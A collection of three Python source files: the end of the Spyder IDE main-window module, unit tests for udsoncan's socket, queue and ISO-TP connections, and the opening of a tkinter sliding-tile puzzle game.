for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin_name, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""
Actions to be performed only after the main window's `show` method
is triggered.
"""
# Required plugins
help_plugin = self.get_plugin(Plugins.Help, error=False)
ipyconsole = self.get_plugin(Plugins.IPythonConsole, error=False)
projects = self.get_plugin(Plugins.Projects, error=False)
editor = self.get_plugin(Plugins.Editor, error=False)
console = self.get_plugin(Plugins.Console, error=False)
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# Call on_mainwindow_visible for all plugins.
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin.on_mainwindow_visible()
QApplication.processEvents()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if console and console.dockwidget.isVisible() and DEV is None:
console.toggle_view_action.setChecked(False)
console.dockwidget.hide()
# Show Help and IPython console by default
plugins_to_show = []
if help_plugin:
plugins_to_show.append(help_plugin)
if ipyconsole:
plugins_to_show.append(ipyconsole)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Load project, if any.
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
if projects:
projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
if projects:
projects.reopen_last_project()
# If no project is active, load last session
if projects and projects.get_active_project() is None:
if editor:
editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# To avoid regressions. We shouldn't have loaded the modules
# below at this point.
if DEV is not None:
assert 'pandas' not in sys.modules
assert 'matplotlib' not in sys.modules
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
projects = self.get_plugin(Plugins.Projects, error=False)
if projects:
path = projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
shortcuts = self.get_plugin(Plugins.Shortcuts, error=False)
if shortcuts:
shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
editor = self.get_plugin(Plugins.Editor, error=False)
if editor:
editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
if hasattr(self, 'editor'):
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.get_plugin(Plugins.Editor, error=False):
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if hasattr(self, 'layouts'):
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False, close_immediately=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
can_close = PLUGIN_REGISTRY.delete_all_plugins(
excluding={Plugins.Layout}, close_immediately=close_immediately)
if not can_close and not close_immediately:
return False
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
PLUGIN_REGISTRY.delete_plugin(Plugins.Layout)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
console = self.get_plugin(Plugins.Console, error=False)
if console:
if state:
console.redirect_stds()
else:
console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
editor = self.get_plugin(Plugins.Editor, error=False)
variableexplorer = self.get_plugin(
Plugins.VariableExplorer, error=False)
if encoding.is_text_file(fname):
if editor:
editor.load(fname)
elif variableexplorer is not None and ext in IMPORT_EXT:
variableexplorer.get_widget().import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
projects = self.get_plugin(Plugins.Projects, error=False)
read_only_path = ()
if projects:
read_only_path = tuple(projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
projects = self.get_plugin(Plugins.Projects, error=False)
self.project_path = ()
if projects:
self.project_path = tuple(projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False, close_immediately=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(
reset=reset, close_immediately=close_immediately)
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
test_connection.py
|
from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
_STACK_UNVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
_STACK_UNVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
while self.sock1 is None:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(_STACK_POSSIBLE == False, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", is_extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", is_extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
|
numski.py
|
import tkinter as tk
from tkinter.constants import SEL_FIRST
import tkinter.font
from tkinter import messagebox
from random import choice
from time import perf_counter, sleep
from threading import Barrier, Thread
from widgets import generate_font, get_date, button, winner_dialog, shuffling_dialog
tileImg = None
tileImg_a = None
spaceImg = None
barrierImg = None
class numski(tk.Frame):
def __init__(self, size=(5,5), shuffle_times=None, mode='Normal', master=None, gamerule=0):
'''
gamerule: 0 == classical, 1 == barrier
'''
super().__init__(master)
self.master = master
self.configure(bg='white')
self.master.grab_set()
self.size_x, self.size_y = size[0], size[1]
self.length = self.size_x*self.size_y
if shuffle_times == None:
self.shuffle_times = self.length**2
else:
self.shuffle_times = shuffle_times
self.mode = mode
self.gamerule = gamerule
self.list_finish = [i for i in range(1,self.length)]
self.list_finish.append(0)
self.list_play = [i for i in range(1,self.length)]
self.font = generate_font()
self.create_tiles()
self.arrange_tiles()
self.status = 0
self.last_dest = 0
self.space_pos = self.length - 1
self.time_thread = Thread(target=self.timer)
self.shuffle_thread = Thread(target=self.shuffle_tiles, args=(self.shuffle_times,None))
self.count = 0
self.count_var = tk.StringVar(self)
self.count_var.set("0")
self.time_used = tk.StringVar(self)
self.time_used.set("0")
## self.shuffle_thread.start()
self.count_font = generate_font(size=12)
def barrier_rule_init(self):
global barrierImg
self.gamerule = 1
barrierImg = tk.PhotoImage(file='GUI/GUI_barrier.png')
self.barriers = [0 for i in range(0, self.length)]
self.master.bind('<Button-1>', self.set_barrier)
def set_barrier(self, event):
global barrierImg
tile = event.widget
tile_pos = self.get_tile_pos(tile)
if tile_pos != self.space_pos:
self.barriers[tile_pos] = 0
tile.configure(text='', image=barrierImg)
tile.unbind('<Enter>')
tile.unbind('<Leave>')
tile.unbind('<FocusIn>')
tile.unbind('<FocusOut>')
print('%d set barrier' % tile_pos)
else:
print('%d cannot set barrier as it is space' % tile_pos)
return None
def bind_keys(self):
self.master.bind('<Key-Up>', lambda event: self.key_move(1))
self.master.bind('<Key-Down>', lambda event: self.key_move(3))
self.master.bind('<Key-Left>', lambda event: self.key_move(0))
self.master.bind('<Key-Right>', lambda event: self.key_move(2))
